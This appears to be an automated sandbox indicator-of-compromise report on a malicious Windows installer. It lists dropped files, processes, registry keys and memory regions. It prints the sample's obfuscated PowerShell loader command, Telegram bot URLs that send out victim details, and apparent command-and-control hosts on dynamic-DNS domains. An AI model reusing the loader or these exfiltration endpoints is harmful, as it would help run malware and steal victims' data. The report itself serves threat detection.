IOC Report
NDQ211216GM08.exe.bin.exe

loading gif

Files

File Path
Type
Category
Malicious
NDQ211216GM08.exe.bin.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Nonalined.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\Nonalined.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x1c80b452, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Faktureringsmaskinerne.Cre
data
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan
Unicode text, UTF-8 text, with very long lines (3065), with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\Forsnvringers.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\Importrer.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\Saxons.jpg
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 742x434, components 3
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\baandstationerne\ultraliberal.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\eneanpartshaveren.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\maanedsbladene.pyt
data
dropped
C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\squeg\treenighed.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42gdj45o.azy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se0q3vm2.eyf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yh3qeqop.d1b.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzxfuefn.qgj.psm1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 12 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe
"C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
malicious
C:\Users\user\AppData\Local\Temp\Nonalined.exe
"C:\Users\user\AppData\Local\Temp\Nonalined.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
unknown
https://duckduckgo.com/ac/?q=
unknown
https://reallyfreegeoip.org/xml/8.46.123.189
104.21.80.1
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
https://www.ecosia.org/newtab/v20Y&
unknown
https://contoso.com/License
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
https://www.google.com
unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
unknown
http://checkip.dyndns.org/
193.122.130.0
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://aka.ms/pscore6lBjr
unknown
https://apis.google.com
unknown
https://chrome.google.com/webstore?hl=enlBjr
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://reallyfreegeoip.org/xml/
unknown
https://drive.google.com/9A
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://crl.ver)
unknown
https://ac.ecosia.org?q=
unknown
https://drive.usercontent.google.com/
unknown
http://checkip.dyndns.org
unknown
https://chrome.google.com/webstore?hl=en4
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://github.com/Pester/Pester
unknown
https://www.office.com/lBjr
unknown
http://aborters.duckdns.org:8081
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
http://crl.m
unknown
https://www.office.com/4
unknown
https://g.live.com/odclientsettings/Prod-C:
unknown
http://anotherarmy.dns.army:8081
unknown
https://duckduckgo.com/chrome_newtabv20
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://g.live.com/odclientsettings/ProdV2-C:
unknown
https://reallyfreegeoip.org/xml/8.46.123.189$
unknown
https://reallyfreegeoip.org
unknown
https://drive.google.com/qA
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://gemini.google.com/app?q=
unknown
There are 43 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.74.206
drive.usercontent.google.com
142.250.186.129
reallyfreegeoip.org
104.21.80.1
api.telegram.org
149.154.167.220
checkip.dyndns.com
193.122.130.0
checkip.dyndns.org
unknown

IPs

IP
Domain
Country
Malicious
142.250.186.129
drive.usercontent.google.com
United States
149.154.167.220
api.telegram.org
United Kingdom
142.250.74.206
drive.google.com
United States
193.122.130.0
checkip.dyndns.com
United States
127.0.0.1
unknown
unknown
104.21.80.1
reallyfreegeoip.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Nonalined_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
20251000
trusted library allocation
page read and write
malicious
A131000
direct allocation
page execute and read and write
malicious
20550000
trusted library allocation
page read and write
6DFE000
stack
page read and write
84D0000
trusted library allocation
page read and write
4A7000
heap
page read and write
23470000
trusted library allocation
page read and write
2043D000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
819A000
heap
page read and write
7DC0000
trusted library allocation
page execute and read and write
1FF20000
trusted library allocation
page read and write
7EF29FE000
unkown
page readonly
1FF20000
trusted library allocation
page read and write
7DB0000
trusted library allocation
page read and write
234A0000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
2527F0F0000
heap
page read and write
AD000
trusted library allocation
page execute and read and write
1FF20000
trusted library allocation
page read and write
2527EE13000
heap
page read and write
1FF20000
trusted library allocation
page read and write
229E0000
heap
page read and write
20230000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
2520450E000
heap
page read and write
4030000
direct allocation
page read and write
23470000
trusted library allocation
page read and write
21251000
trusted library allocation
page read and write
25204614000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
7EC0000
heap
page read and write
810D000
heap
page read and write
7EF28FE000
unkown
page readonly
22B60000
trusted library allocation
page read and write
252043D0000
trusted library allocation
page read and write
6F6000
heap
page read and write
21302000
trusted library allocation
page read and write
25204400000
heap
page read and write
9E0000
trusted library allocation
page read and write
25205000000
heap
page read and write
22400000
trusted library allocation
page read and write
1FF00000
trusted library allocation
page read and write
23597000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
2527EE7C000
heap
page read and write
B6000
trusted library allocation
page execute and read and write
23470000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
815A000
heap
page read and write
8510000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
2527F991000
trusted library allocation
page read and write
40A000
unkown
page write copy
D3C000
stack
page read and write
2527EE2B000
heap
page read and write
2527FC40000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
3E90000
heap
page read and write
235F0000
trusted library allocation
page read and write
7FAE000
stack
page read and write
23470000
trusted library allocation
page read and write
1FF10000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
A20000
trusted library allocation
page read and write
203E1000
trusted library allocation
page read and write
234A0000
trusted library allocation
page read and write
6F70000
trusted library allocation
page read and write
204F7000
trusted library allocation
page read and write
7EF21FE000
unkown
page readonly
D90000
trusted library allocation
page read and write
1FF00000
trusted library allocation
page read and write
49E000
heap
page read and write
223F0000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
252046A0000
trusted library allocation
page read and write
7E3000
heap
page read and write
69F0000
direct allocation
page read and write
234A0000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
25204506000
heap
page read and write
44B0000
trusted library allocation
page read and write
22F7E000
stack
page read and write
235A0000
trusted library allocation
page read and write
A7E000
stack
page read and write
70A01000
unkown
page execute read
23470000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
20C0000
heap
page read and write
22400000
trusted library allocation
page read and write
3F07000
heap
page read and write
4B5000
heap
page read and write
22400000
trusted library allocation
page read and write
2527EE40000
heap
page read and write
2527EE94000
heap
page read and write
4149000
heap
page read and write
49E000
heap
page read and write
223AA000
heap
page read and write
6E3E000
stack
page read and write
6BE0000
heap
page read and write
4990000
direct allocation
page read and write
23410000
trusted library allocation
page read and write
D7E000
stack
page read and write
23470000
trusted library allocation
page read and write
213D6000
trusted library allocation
page read and write
40A000
unkown
page read and write
4B26000
trusted library allocation
page read and write
25204600000
trusted library allocation
page read and write
4A3000
heap
page read and write
235B0000
trusted library allocation
page read and write
4183000
heap
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
40D8000
heap
page read and write
4070000
direct allocation
page read and write
4183000
heap
page read and write
22B60000
trusted library allocation
page read and write
25204455000
heap
page read and write
4425000
heap
page execute and read and write
22400000
trusted library allocation
page read and write
4B5000
heap
page read and write
20403000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
CD0000
heap
page readonly
252043B0000
trusted library allocation
page read and write
1FB7F000
stack
page read and write
1FF20000
trusted library allocation
page read and write
235D0000
trusted library allocation
page read and write
20557000
trusted library allocation
page read and write
10E000
stack
page read and write
4181000
heap
page read and write
4A3000
heap
page read and write
2527EDF0000
heap
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FDFA000
stack
page read and write
235B0000
trusted library allocation
page read and write
2527FFA0000
trusted library section
page readonly
80E8000
heap
page read and write
1FF20000
trusted library allocation
page read and write
3651000
remote allocation
page execute and read and write
427000
unkown
page read and write
1FF20000
trusted library allocation
page read and write
7EF1EFC000
stack
page read and write
23470000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
21434000
trusted library allocation
page read and write
9D000
trusted library allocation
page execute and read and write
3EF0000
direct allocation
page read and write
2527EE73000
heap
page read and write
ABE000
stack
page read and write
4A7000
heap
page read and write
25204610000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
7EF2EFE000
unkown
page readonly
22400000
trusted library allocation
page read and write
4BE000
heap
page read and write
160000
trusted library allocation
page read and write
4149000
heap
page read and write
23470000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
252043E0000
trusted library allocation
page read and write
7EF237E000
stack
page read and write
8120000
heap
page read and write
4BE000
heap
page read and write
23470000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
70A03000
unkown
page read and write
7EF287E000
stack
page read and write
235A0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
80E0000
heap
page read and write
9731000
direct allocation
page execute and read and write
2058A000
trusted library allocation
page read and write
2527EE5B000
heap
page read and write
305F000
stack
page read and write
202B5000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
748000
heap
page read and write
23470000
trusted library allocation
page read and write
2144A000
trusted library allocation
page read and write
7D5D000
stack
page read and write
23470000
trusted library allocation
page read and write
270C000
heap
page read and write
22B60000
trusted library allocation
page read and write
7D9E000
stack
page read and write
2021D000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
252044D3000
heap
page read and write
1FF20000
trusted library allocation
page read and write
4B5000
heap
page read and write
4143000
heap
page read and write
22400000
trusted library allocation
page read and write
23450000
trusted library allocation
page read and write
4116000
heap
page read and write
711B000
heap
page read and write
180000
trusted library allocation
page read and write
2307F000
stack
page read and write
4040000
direct allocation
page read and write
234D0000
trusted library allocation
page read and write
4A3000
heap
page read and write
49E000
heap
page read and write
21558000
trusted library allocation
page read and write
6A10000
direct allocation
page read and write
23410000
trusted library allocation
page read and write
204C1000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FF10000
trusted library allocation
page read and write
492000
heap
page read and write
6F80000
trusted library allocation
page read and write
20240000
heap
page execute and read and write
1FF20000
trusted library allocation
page read and write
9C0000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
4A7000
heap
page read and write
23460000
trusted library allocation
page read and write
2527F702000
heap
page read and write
22B60000
trusted library allocation
page read and write
2527F713000
heap
page read and write
43FE000
stack
page read and write
20547000
trusted library allocation
page read and write
234D0000
trusted library allocation
page read and write
252043C0000
trusted library allocation
page read and write
D80000
trusted library allocation
page execute and read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
20335000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
7199000
heap
page read and write
7117000
heap
page read and write
235A0000
trusted library allocation
page read and write
20412000
trusted library allocation
page read and write
7EF36FE000
unkown
page readonly
1FDB0000
direct allocation
page read and write
20E0000
heap
page read and write
2527EE78000
heap
page read and write
22400000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
3F05000
heap
page read and write
59F9000
trusted library allocation
page read and write
81B6000
heap
page read and write
234E0000
trusted library allocation
page read and write
4980000
direct allocation
page read and write
4A7000
heap
page read and write
22400000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
252043D0000
trusted library allocation
page read and write
8054000
heap
page read and write
990000
heap
page read and write
1FF00000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
234D0000
trusted library allocation
page read and write
8304000
trusted library allocation
page read and write
20301000
trusted library allocation
page read and write
A30000
heap
page execute and read and write
22B60000
trusted library allocation
page read and write
422000
unkown
page read and write
235C0000
trusted library allocation
page read and write
26E1000
unkown
page readonly
8B7B000
stack
page read and write
4060000
direct allocation
page read and write
7142000
heap
page read and write
234D0000
trusted library allocation
page read and write
20541000
trusted library allocation
page read and write
83A000
heap
page read and write
23470000
trusted library allocation
page read and write
2040D000
trusted library allocation
page read and write
23420000
trusted library allocation
page read and write
25204770000
remote allocation
page read and write
201FE000
trusted library allocation
page read and write
7EF26FB000
stack
page read and write
22400000
trusted library allocation
page read and write
223F6000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
1FBBE000
stack
page read and write
22B70000
heap
page execute and read and write
4A29000
trusted library allocation
page read and write
5A36000
trusted library allocation
page read and write
7EF25FE000
unkown
page readonly
72D0000
trusted library allocation
page read and write
40A000
unkown
page write copy
5AE000
stack
page read and write
1FF20000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
235A0000
trusted library allocation
page read and write
408000
unkown
page readonly
23470000
trusted library allocation
page read and write
6BD0000
heap
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
20222000
trusted library allocation
page read and write
419C000
heap
page read and write
201EE000
stack
page read and write
2708000
heap
page read and write
23470000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
49E000
heap
page read and write
5B65000
trusted library allocation
page read and write
23420000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
7220000
trusted library allocation
page execute and read and write
23440000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
252044DE000
heap
page read and write
190000
trusted library allocation
page read and write
213BA000
trusted library allocation
page read and write
23430000
trusted library allocation
page read and write
408000
unkown
page readonly
7EF1FFE000
unkown
page readonly
1FF20000
trusted library allocation
page read and write
20040000
heap
page read and write
7280000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
223F0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
59F5000
trusted library allocation
page read and write
1F90E000
stack
page read and write
4A3000
heap
page read and write
1FF20000
trusted library allocation
page read and write
69D0000
direct allocation
page read and write
252044FC000
heap
page read and write
5E0000
heap
page read and write
3E7000
stack
page read and write
734B000
stack
page read and write
23470000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
20545000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
5B0000
heap
page read and write
4A7000
heap
page read and write
6F90000
trusted library allocation
page read and write
49E000
heap
page read and write
1FF20000
trusted library allocation
page read and write
6F0000
heap
page read and write
72B0000
trusted library allocation
page read and write
C2000
trusted library allocation
page read and write
2527EE7A000
heap
page read and write
22B60000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
234A0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
230BE000
stack
page read and write
252046A0000
trusted library allocation
page read and write
4A7000
heap
page read and write
234A0000
trusted library allocation
page execute and read and write
98000
stack
page read and write
413C000
heap
page read and write
7E34000
trusted library allocation
page read and write
234C0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
21631000
trusted library allocation
page read and write
5B7A000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
4146000
heap
page read and write
4B5000
heap
page read and write
1FF20000
trusted library allocation
page read and write
6F47000
trusted library allocation
page read and write
1FF10000
trusted library allocation
page read and write
492000
heap
page read and write
1FD10000
remote allocation
page read and write
1FF20000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
454000
unkown
page readonly
22394000
heap
page read and write
1FF20000
trusted library allocation
page read and write
203CE000
trusted library allocation
page read and write
25204633000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FF00000
trusted library allocation
page read and write
48ED000
stack
page read and write
23420000
trusted library allocation
page read and write
714F000
heap
page read and write
49D1000
trusted library allocation
page read and write
2029D000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
7EF367E000
stack
page read and write
234D0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
4BE000
heap
page read and write
2C51000
remote allocation
page execute and read and write
660000
heap
page read and write
4B5000
heap
page read and write
2154C000
trusted library allocation
page read and write
204CA000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
234D0000
trusted library allocation
page read and write
25204710000
trusted library allocation
page read and write
8D31000
direct allocation
page execute and read and write
7FE000
stack
page read and write
22400000
trusted library allocation
page read and write
190000
trusted library allocation
page read and write
20309000
trusted library allocation
page read and write
21564000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
1FF00000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
8310000
trusted library allocation
page read and write
460000
heap
page read and write
23470000
trusted library allocation
page read and write
2704000
heap
page read and write
3EE0000
direct allocation
page read and write
25204441000
heap
page read and write
400000
unkown
page readonly
400000
unkown
page readonly
22B60000
trusted library allocation
page read and write
2131E000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
486C000
stack
page read and write
20359000
trusted library allocation
page read and write
204F3000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
170000
trusted library allocation
page read and write
401000
unkown
page execute read
20230000
trusted library allocation
page read and write
235B0000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
22400000
trusted library allocation
page read and write
419A000
heap
page read and write
25204487000
heap
page read and write
1FF20000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
492000
heap
page read and write
49B0000
direct allocation
page read and write
3170000
heap
page read and write
202C3000
trusted library allocation
page read and write
235E0000
trusted library allocation
page execute and read and write
1FF00000
trusted library allocation
page read and write
2527EEFF000
heap
page read and write
1FF10000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
23440000
trusted library allocation
page read and write
234E0000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
204A8000
trusted library allocation
page read and write
25200340000
trusted library allocation
page read and write
20C4000
heap
page read and write
730000
trusted library section
page read and write
235C0000
trusted library allocation
page read and write
20405000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
AC8000
heap
page read and write
1FF20000
trusted library allocation
page read and write
6F60000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
23480000
trusted library allocation
page execute and read and write
4BE000
heap
page read and write
1FF20000
trusted library allocation
page read and write
4A3000
heap
page read and write
21279000
trusted library allocation
page read and write
560000
heap
page read and write
1FF20000
trusted library allocation
page read and write
2527F700000
heap
page read and write
CE8000
trusted library allocation
page read and write
2527EEAE000
heap
page read and write
400000
unkown
page readonly
1FF20000
trusted library allocation
page read and write
20553000
trusted library allocation
page read and write
203D2000
trusted library allocation
page read and write
94000
trusted library allocation
page read and write
4BE000
heap
page read and write
235A0000
trusted library allocation
page read and write
25204600000
trusted library allocation
page read and write
408000
unkown
page readonly
1FF20000
trusted library allocation
page read and write
41C3000
heap
page read and write
22399000
heap
page read and write
7EF1CF9000
stack
page read and write
234D0000
trusted library allocation
page read and write
23590000
trusted library allocation
page read and write
7EF1DFE000
unkown
page readonly
235F0000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
7EAE000
stack
page read and write
1FF20000
trusted library allocation
page read and write
6A20000
direct allocation
page read and write
7210000
trusted library allocation
page read and write
204B8000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
3680000
heap
page read and write
1FF20000
trusted library allocation
page read and write
23480000
trusted library allocation
page read and write
252044F4000
heap
page read and write
3D30000
heap
page read and write
1FF00000
trusted library allocation
page read and write
9FA000
trusted library allocation
page execute and read and write
20585000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
6F40000
trusted library allocation
page read and write
A90000
heap
page read and write
93000
trusted library allocation
page execute and read and write
22DBF000
stack
page read and write
1FF20000
trusted library allocation
page read and write
2058E000
trusted library allocation
page read and write
49E000
heap
page read and write
2527F75A000
heap
page read and write
1FF20000
trusted library allocation
page read and write
222F0000
heap
page read and write
4A7000
heap
page read and write
229E1000
heap
page read and write
1FF20000
trusted library allocation
page read and write
6FD0000
trusted library allocation
page read and write
454000
unkown
page readonly
2527F010000
heap
page read and write
1FF20000
trusted library allocation
page read and write
202F9000
trusted library allocation
page read and write
20583000
trusted library allocation
page read and write
235C0000
trusted library allocation
page read and write
2527FF80000
trusted library section
page readonly
4A7000
heap
page read and write
4180000
heap
page read and write
21502000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
204A3000
trusted library allocation
page read and write
212B7000
trusted library allocation
page read and write
234A0000
trusted library allocation
page read and write
49A0000
direct allocation
page read and write
1FF20000
trusted library allocation
page read and write
2232F000
heap
page read and write
5B75000
trusted library allocation
page read and write
4149000
heap
page read and write
2161C000
trusted library allocation
page read and write
B2000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
234A0000
trusted library allocation
page read and write
246E000
stack
page read and write
234D0000
trusted library allocation
page read and write
492000
heap
page read and write
70AE000
stack
page read and write
22B60000
trusted library allocation
page read and write
454000
unkown
page readonly
72E0000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
740000
heap
page read and write
AC0000
heap
page read and write
21569000
trusted library allocation
page read and write
812A000
heap
page read and write
23600000
trusted library allocation
page read and write
20407000
trusted library allocation
page read and write
21506000
trusted library allocation
page read and write
7B9000
heap
page read and write
20230000
trusted library allocation
page read and write
235D0000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
7EF2C7E000
unkown
page readonly
49E000
heap
page read and write
25204502000
heap
page read and write
44AD000
stack
page read and write
21319000
trusted library allocation
page read and write
44E0000
heap
page read and write
7EF297E000
stack
page read and write
1FD4E000
stack
page read and write
2527F600000
heap
page read and write
CB000
trusted library allocation
page execute and read and write
22B60000
trusted library allocation
page read and write
202F5000
trusted library allocation
page read and write
1FEF7000
stack
page read and write
44E7000
heap
page read and write
1FF20000
trusted library allocation
page read and write
9E9000
trusted library allocation
page read and write
25204462000
heap
page read and write
7CE0000
heap
page read and write
235B0000
trusted library allocation
page read and write
235A0000
trusted library allocation
page read and write
2527EEB2000
heap
page read and write
22400000
trusted library allocation
page read and write
214C5000
trusted library allocation
page read and write
4F74000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
1FF00000
trusted library allocation
page read and write
4A3000
heap
page read and write
23470000
trusted library allocation
page read and write
9D3000
trusted library allocation
page execute and read and write
1FF30000
heap
page read and write
42C000
unkown
page read and write
2527FFD1000
trusted library allocation
page read and write
2527F580000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
70ED000
stack
page read and write
1FF10000
trusted library allocation
page read and write
1FF10000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
20230000
trusted library allocation
page read and write
2527EE8E000
heap
page read and write
23470000
trusted library allocation
page read and write
8B80000
trusted library allocation
page execute and read and write
252044F2000
heap
page read and write
4BE000
heap
page read and write
22B5E000
stack
page read and write
72F0000
trusted library allocation
page read and write
23470000
trusted library allocation
page read and write
22420000
heap
page read and write
204FE000
trusted library allocation
page read and write
22B60000
trusted library allocation
page read and write
1FF20000
trusted library allocation
page read and write
252044EB000
heap
page read and write
20211000
trusted library allocation
page read and write
2030D000
trusted library allocation
